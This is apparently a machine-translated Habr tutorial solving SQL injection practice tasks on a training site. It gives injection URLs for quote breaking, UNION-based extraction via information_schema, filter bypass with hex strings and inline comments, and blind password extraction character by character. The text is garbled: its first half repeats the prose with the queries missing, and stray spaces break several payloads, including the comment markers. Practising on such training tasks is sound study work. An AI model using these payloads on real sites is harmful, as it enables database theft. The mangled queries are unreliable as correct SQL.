Solving sql injection tasks from alexbers.com/sql
- From the sandbox
- Tutorial
I want to share with Habrahabr an example of my solutions to sql injection tasks from the alexbers website.
This is not even an example. It is required to write a query yourself with tables known in advance by all, a username.
Decision:
and the link will look like this:
Just a request with all the data that we know about.
We have been shown a request:
Given:
This example shows a primitive vulnerability: input is not filtered in any way. Therefore, we can use the quotation mark:
What have we done? We brought the request to this form:
We are trying to extract a user with
Again the request is visible:
Given:
The difference with the previous example is the restriction on output in 1 line. He goes away dancing when setting a comment that will “remove” the end of the line, ie It will not be processed.
Decision:
Type of request:
Thus, we throw out the restriction and extract the user with id = 13.
Inquiry:
Given:
A bit more interesting. Now we have 2 tables and the query is not executed to the table that we need. We will use the classic way. In mysql there is an operator that allows you to query different tables through 1 query. To work with query aggregation, we need the same number of fields in all query aggregations. We use the operator
Request:
One of the results will be the answer to the level.
Inquiry:
Given:
Let's try to repeat the previous example. We will find out how many columns are in the table
We see that in our table secret - there are 2 columns, we will extract their values:
We see the answer.
Inquiry:
Given:
Here you can see the misunderstanding of the principles of the filter
Given:
Inquiry:
Since the selection goes immediately to the table we need, you don’t even have to use the second query. Spaces are replaced with comments
Inquiry:
Given:
The only thing that something is generally displayed to us is information that some kind of error has occurred, or the number of records displayed. The number of records displayed is the only number we can control. We are required to obtain a password from the user. A password is some information written in alphanumeric form. All we can operate with is numbers. So the password must be presented in numerical form. If you take and translate each character in ascii – form, then any character from the password will be in the form of a number. We will use the function to separate the character
The output will give us an ascii representation of the first character of the password. Then we make a request for the second, etc.
That is, we need to pull out the numerical value of each login and add it. In this case, we will operate with the following comparison:
The attack vector is divided into 2 queries:
There are 1069 entries in the table, so we won’t be able to display the answer in one
The solution to the 10th task is already described on YouTube, you can see it here: www.youtube.com/watch?v=dLSxTGvwcLw
Example 1: www.alexbers.com/sql/1.php
This is not even an example. It is required to write a query yourself with tables known in advance by all, a username.
Given: Table: users Fields: id, login, pass
Decision:
select * from users where id = '12 '
and the link will look like this:
https://www.alexbers.com/sql/1.php?text=select+*+from+users+where+id%3D%2712%27
Just a request with all the data that we know about.
Example 2: www.alexbers.com/sql/qnbutn2.php
We have been shown a request:
select * from users where id = 2 or login = '$ text'
Given:
Table: users Fields: id, login, pass Requirement: Hooray, I know the answer (user password with id = 9):
This example shows a primitive vulnerability: input is not filtered in any way. Therefore, we can use the quotation mark:
https://www.alexbers.com/sql/qnbutn2.php?text=-1 'or id =' 9
What have we done? We brought the request to this form:
select * from users where id = 2 or login = '- 1' or id = '9'
We are trying to extract a user with
id=2
or with login=1
or with from the users table id=9
, which is taken with a quote on the left and will be closed with the quote of the original request. Since the user -1
does not exist, we do not get anything from this request, but it id=9
does exist. As a result, we get output from 2 lines - user s id=2
and s id=9
.Example 3: www.alexbers.com/sql/sdjjy3.php
Again the request is visible:
select * from users where id = 2 or login = '$ text' limit 1
Given:
Table: users Fields: id, login, pass Requirement: Hooray, I know the answer (user password with id = 13):
The difference with the previous example is the restriction on output in 1 line. He goes away dancing when setting a comment that will “remove” the end of the line, ie It will not be processed.
Decision:
https://www.alexbers.com/sql/sdjjy3.php?text=-1 'or id = 13 - 123
Type of request:
select * from users where id = 2 or login = '- 1' or id = 13 - 123 'limit 1
Thus, we throw out the restriction and extract the user with id = 13.
Example 4: www.alexbers.com/sql/qjqhweh4.php
Inquiry:
select * from users where id = 2 or login = '$ text' limit 1
Given:
Tables: users, secret Fields: id, login, pass - this is in users. Secret table - 3 fields Requirement: Hooray, I know the answer (given to the secret table with the ggg = abc field):
A bit more interesting. Now we have 2 tables and the query is not executed to the table that we need. We will use the classic way. In mysql there is an operator that allows you to query different tables through 1 query. To work with query aggregation, we need the same number of fields in all query aggregations. We use the operator
UNION
. For the task, you need to find the given secret table with the field ggg=abc
. The number of fields in the columns is the same, because the request will take the form: Request:
https://www.alexbers.com/sql/qjqhweh4.php?text=-1'+union+select+* from secret where ggg = 'abc' + - + 123
One of the results will be the answer to the level.
Example 5: www.alexbers.com/sql/sdfkjsdk5.php
Inquiry:
select * from users where id = 2 or login = '$ text' limit 1
Given:
Tables: users, secret Fields: id, login, pass - this is in users. Secret table - 2 fields Requirement: Hooray, I know the answer (given by the secret table):
Let's try to repeat the previous example. We will find out how many columns are in the table
users
, we will extract a list of all columns for the secret table. At the moment, we do not have the same number of columns, so union must be used differently.https://www.alexbers.com/sql/sdfkjsdk5.php ? text = 1 'union + select + 1, concat_ws (0x3a, table_name, column_name), 3 + from + information_schema.columns where table_name =' secret '- + 123
We see that in our table secret - there are 2 columns, we will extract their values:
https://www.alexbers.com/sql/sdfkjsdk5.php?text=-1 'union select 1, dfgdfgfdg, dfgfddfgdfdfdf from secret-- 123
We see the answer.
Example 6: www.alexbers.com/sql/skldj6
Inquiry:
select * from users where id = $ text limit 1
Given:
Tables: users Fields: id, login, pass - this is in users. Quotation marks are filtered, only 1 row is output from the database Requirement: Hurray, I know the answer (user password with the nickname god):
Here you can see the misunderstanding of the principles of the filter
mysq_real_escape_string
when the value of the id variable is not placed in quotation marks. Then, although they are filtered 50 times, we do not need them, for text fields it will be possible to use a function CHAR()
or translate it to hex.https://www.alexbers.com/sql/skldj6.php?text=-1 union select id, login, pass from users where login = 0x676f64
Example 7: www.alexbers.com/sql/dsfhsdjkf7.php
Given:
Tables: users Fields: id, login, pass - this is in users. Now only the first line of the answer is always displayed (the rest are not displayed) The characters', ", +, =, comma, space, brackets are filtered Requirement: Hooray, I know the answer (user password, with a nickname containing gentoo):
Inquiry:
select * from users where id = $ text limit 1
Since the selection goes immediately to the table we need, you don’t even have to use the second query. Spaces are replaced with comments
/**/ и /*!*/
, there is only one problem - the equal sign is filtered. But it can be bypassed using the operator like
. Comparing to a string involves quotation marks, so we encode it in hex. Also, we are not known for certain the nickname we are looking for, so we will use the mask search with the %
login icon. The resulting attack vector will take the form:https://www.alexbers.com/sql/dsfhsdjkf7.php?text=-1/*!or/*!login*/like/**/0x2567656e746f6f25
Example 8: www.alexbers.com/sql/qqqwwweeerrr8.php
Inquiry:
select * from users where id = $ text
Given:
Tables: users Fields: id, login, pass - this is in users. Hint: error messages will not be displayed Requirement: Hooray, I know the answer (user password, with the nickname fast)
The only thing that something is generally displayed to us is information that some kind of error has occurred, or the number of records displayed. The number of records displayed is the only number we can control. We are required to obtain a password from the user. A password is some information written in alphanumeric form. All we can operate with is numbers. So the password must be presented in numerical form. If you take and translate each character in ascii – form, then any character from the password will be in the form of a number. We will use the function to separate the character
mid()
, for ascii - the function ascii()
, the attack vector will turn out like this:https://www.alexbers.com/sql/qqqwwweeerrr8.php ? text = -1 or id <= (select ascii (mid (pass, 1,1)) from users where login = 'fast')
The output will give us an ascii representation of the first character of the password. Then we make a request for the second, etc.
Example 9: www.alexbers.com/sql/almost9.php
Tables: users Fields: id, login, pass - this is in users. Request: select * from users where id = $ text Required: "Hooray, I know the answer (the numerical sum of user logins with 20 <= id <= 30)."
That is, we need to pull out the numerical value of each login and add it. In this case, we will operate with the following comparison:
The attack vector is divided into 2 queries:
https://www.alexbers.com/sql/almost9.php ? text = -1 or id <= cast ((select sum (login) from users where id between 20 and 30) as signed INTEGER) / 10 https://www.alexbers.com/sql/almost9.php ? text = -1 or id <= MOD (cast ((select sum (login) from users where id between 20 and 30) as signed INTEGER), 10)
There are 1069 entries in the table, so we won’t be able to display the answer in one
example 10
The solution to the 10th task is already described on YouTube, you can see it here: www.youtube.com/watch?v=dLSxTGvwcLw